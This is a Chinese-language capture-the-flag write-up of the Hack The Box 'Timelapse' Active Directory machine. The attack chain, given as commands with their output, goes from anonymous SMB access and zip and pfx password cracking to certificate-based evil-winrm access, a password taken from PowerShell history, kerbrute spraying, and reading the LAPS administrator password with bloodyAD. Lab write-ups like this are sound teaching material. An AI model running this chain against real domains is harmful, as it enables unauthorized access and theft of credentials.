Tracks-AD-Timelapse

AD
14k words

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ sudo nmap -sU 10.10.11.152 --top-ports=200 --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 01:35 EST
Nmap scan report for 10.10.11.152
Host is up (0.36s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

└─$ sudo nmap -sS 10.10.11.152 -p- --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 01:34 EST
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 55.94% done; ETC: 01:35 (0:00:43 remaining)
Nmap scan report for 10.10.11.152
Host is up (0.28s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5986/tcp  open  wsmans
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49690/tcp open  unknown

ldap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
└─$ ldapsearch -x -H ldap://10.10.11.152  -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=timelapse,DC=htb
ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=timelapse,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=timelapse,DC=htb
namingContexts: CN=Configuration,DC=timelapse,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 131193
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=timelapse,DC=htb
dnsHostName: dc01.timelapse.htb
defaultNamingContext: DC=timelapse,DC=htb
currentTime: 20241228145015.0Z
configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

to User

smb匿名访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

└─$ smbmap -u anonymous -p '' -H 10.10.11.152

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.152:445        Name: 10.10.11.152              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

其中shares可读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

┌──(fonllge㉿harusaruhi)-[~/Desktop/htb/Timelapse]
└─$ smbmap -u anonymous -p '' -H 10.10.11.152 -r Shares

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.152:445        Name: 10.10.11.152              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        Shares                                                  READ ONLY
        ./Shares
        dr--r--r--                0 Mon Oct 25 11:55:14 2021    .
        dr--r--r--                0 Mon Oct 25 11:55:14 2021    ..
        dr--r--r--                0 Mon Oct 25 15:40:06 2021    Dev
        dr--r--r--                0 Mon Oct 25 11:55:14 2021    HelpDesk
        SYSVOL                                                  NO ACCESS       Logon server share

HelpDesk中是2一些laps的相关内容

是域内管理员密码自动轮换工具,可以看下

https://trustedsec.com/blog/a-lapse-in-judgement

https://learn.microsoft.com/zh-tw/windows-server/identity/laps/laps-overview

其中Dev路径下存在一个winrm_backup.zip

1
2
3
4
5
└─$ zipinfo winrm_backup.zip           
Archive:  winrm_backup.zip
Zip file size: 2611 bytes, number of entries: 1
-rwxr-xr-x  3.0 unx     2555 BX defN 21-Oct-25 10:21 legacyy_dev_auth.pfx
1 file, 2555 bytes uncompressed, 2393 bytes compressed:  6.3%

其中又有一个pfx证书,zip是加密的,通过zip2john导hash尝试跑密码

1
2
└─$ zip2john winrm_backup.zip > ziphash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
1
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20abd7d695aa16d8c88a3cec7243acf179b842f2

导出来的hash因为我用的hashcat所以需要改一下头的格式

hashcat的格式如下

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ hashcat --example|grep -i pkzip
  Name................: PKZIP (Compressed)
  Example.Hash........: $pkzip2$1*1*2*0*e3*1c5*eda7a8de*0*28*8*e3*eda7*...zip2$ [Truncated, use --mach for full length]
  Name................: PKZIP (Uncompressed)
  Example.Hash........: $pkzip2$1*1*2*0*1d1*1c5*eda7a8de*0*28*0*1d1*eda...zip2$ [Truncated, use --mach for full length]
  Name................: PKZIP (Compressed Multi-File)
  Example.Hash........: $pkzip2$3*1*1*0*8*24*a425*8827*d1730095cd829e24...zip2$ [Truncated, use --mach for full length]
  Name................: PKZIP (Mixed Multi-File)
  Example.Hash........: $pkzip2$3*1*1*0*0*24*3e2c*3ef8*0619e9d17ff3f994...zip2$ [Truncated, use --mach for full length]
  Name................: PKZIP (Mixed Multi-File Checksum-Only)
  Example.Hash........: $pkzip2$8*1*1*0*8*24*a425*8827*3bd479d541019c2f...zip2$ [Truncated, use --mach for full length]
  Name................: PKZIP Master Key
  Name................: PKZIP Master Key (6 byte optimization)

需要去掉前面那一段path改为

1
$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20abd7d695aa16d8c88a3cec7243acf179b842f2d96414d306fd67f0bb6abd97366b7aaea736a0

尝试了下1721017200,后者17200可行。

跑出supremelegacy

证书也有密码,无法直接使用,所以也需要导hash尝试跑一下

1
pfx2john legacyy_dev_auth.pfx > pfxhash

这里我用john跑的

1
2
3
4
5
6
7
8
9
10
11
└─$ john -format=pfx pfxhash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)     
1g 0:00:00:15 DONE (2024-12-28 10:35) 0.06662g/s 215306p/s 215306c/s 215306C/s thumper1990..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到thuglegacy

这里我当时想pkinit拿nthash

因为当前pfx有密码所以需要解一下生成新的,这里我会用两种方式来做

  • 1.certipy直接转

1
2
3
4
└─$ certipy cert -export -pfx Dev/legacyy_dev_auth.pfx  -password "thuglegacy" -out "legacyy_unprotected.pfx"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'legacyy_unprotected.pfx'

  • 2.分离crt、key去密码重新生成pfx

导出key,转换齐格式即可

1
2
3
4
5
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy.key

└─$ openssl rsa -in legacyy.key -out legacyy_new_nop.key
Enter pass phrase for legacyy.key:
writing RSA key

再导出crt

1
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out legacyy.crt

创建新pfx,这里不需要输入密码了,两次回车就好

1
openssl pkcs12 -export -inkey  legacyy_new_nop.key -in legacyy.crt -out new.pfx

现在openssl -info空密码测一下即可,pem pass虽然也是空的但需要两次>4字符即可查看。

1
2
3
4
5
6
7
8
9
10
11
12
13
openssl pkcs12 -in new.pfx -info 

Enter Import Password:
MAC: sha256, Iteration 2048
MAC length: 32, salt length: 8
PKCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256
Certificate bag
Bag Attributes
    localKeyID: D0 D2 86 AE 3B 8D FB 77 98 34 AD AB 23 EB 21 E6 6F 7B 7A DE
subject=CN=Legacyy
issuer=CN=Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS

拿到证书尝试请求pkinit

1
2
3
4
5
6
└─$ certipy auth -pfx new.pfx -dc-ip 10.10.11.152 -domain timelapse.htb -username legacyy
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: legacyy@timelapse.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

报错了,应该是对面没开pkinit

找到了一篇ADCS进行内网移动的,和这个靶机没什么关联但还是建议看一下,他这个pkinit虽然被ban了但是还是进行了ldap-shell
https://www.mwrcybersec.com/active-and-certified

既然pkinit g了拿不到hash那可以采用PassTheCert或者其他的工具,这里我evil直接连的,因为有证书,所以加个-S用Tls.

1
2
3
4
5
6
7
8
9
10
11
12
└─$ evil-winrm -S -c legacyy.crt -k legacyy_nopasswd.key -i 10.10.11.152 -u legacyy 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls

get User

to Root

在legacyy用户本地搜点的时候有找到ps的记录

1
2
3
4
5
6
7
8
9
10
11
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

得到svc_deploy密码E3R$Q62^12p7PLlC%KWaxuaV

验证一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ kerbrute passwordspray ./user 'E3R$Q62^12p7PLlC%KWaxuaV' --dc 10.10.11.152 -d timelapse.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/28/24 - Ronnie Flathers @ropnop

2024/12/28 14:24:26 >  Using KDC(s):
2024/12/28 14:24:26 >   10.10.11.152:88

2024/12/28 14:24:28 >  [+] VALID LOGIN:  svc_deploy@timelapse.htb:E3R$Q62^12p7PLlC%KWaxuaV
2024/12/28 14:24:28 >  Done! Tested 16 logins (1 successes) in 2.270 seconds

遛狗可以看到,svc_deploy用户所在的组laps_READRSdc01$有readlapsPassword的权限

alt text

说白了就是允许访问目标机器上的ms-Mcs-AdmPwd就是administrator的密码,这laps的机制就是这样的。

powerview或者其他的都可以,总之能访问dc的ms-Mcs-AdmPwd属性就好。

1
2
3
4
└─$ python3 ~/tools/wintools/bloodyAD/bloodyAD.py  --dc-ip 10.10.11.152 -d timelapse.htb --host dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' get object 'dc01$' --attr ms-Mcs-AdmPwd

distinguishedName: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: MXBQ6@J(je.mb[L%e!m1S03&

拿到密码这里我smbclient,htb这里把flag放在另一个用户下

1
2
3
4
5
6
 smbclient  '\\10.10.11.152\C$' -U administrator%'MXBQ6@J(je.mb[L%e!m1S03&'
smb: \Users\trx\desktop\> dir
  .                                  DR        0  Fri Mar  4 01:45:48 2022
  ..                                 DR        0  Fri Mar  4 01:45:48 2022
  desktop.ini                       AHS      282  Fri Mar  4 01:45:48 2022
  root.txt                           AR       34  Sat Dec 28 09:33:46 2024

get Root

这台过于简单了不过多赘述,唯一需要动脑子的地方就是翻appdata,如果直接跑winpeas就能看到了ps的记录,不过这里还是多动手翻翻比较好。